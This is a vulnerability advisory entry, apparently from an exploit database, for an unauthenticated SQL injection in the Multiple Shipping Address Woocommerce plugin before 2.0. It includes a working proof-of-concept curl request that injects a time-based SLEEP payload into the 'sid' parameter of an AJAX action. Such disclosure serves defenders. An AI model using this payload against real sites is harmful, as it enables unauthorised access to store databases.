Lucene search

K
wpexploitCydaveWPEX-ID:4D594424-8048-482D-B61C-45BE1E97A8BA
HistoryApr 11, 2022 - 12:00 a.m.

Multiple Shipping Address Woocommerce < 2.0 - Unauthenticated SQLi

2022-04-1100:00:00
cydave
120
woocommerce
unauthenticated
sql injection

EPSS

0.002

Percentile

57.6%

The plugin does not properly sanitise and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(5)))zsme)'

EPSS

0.002

Percentile

57.6%

Related for WPEX-ID:4D594424-8048-482D-B61C-45BE1E97A8BA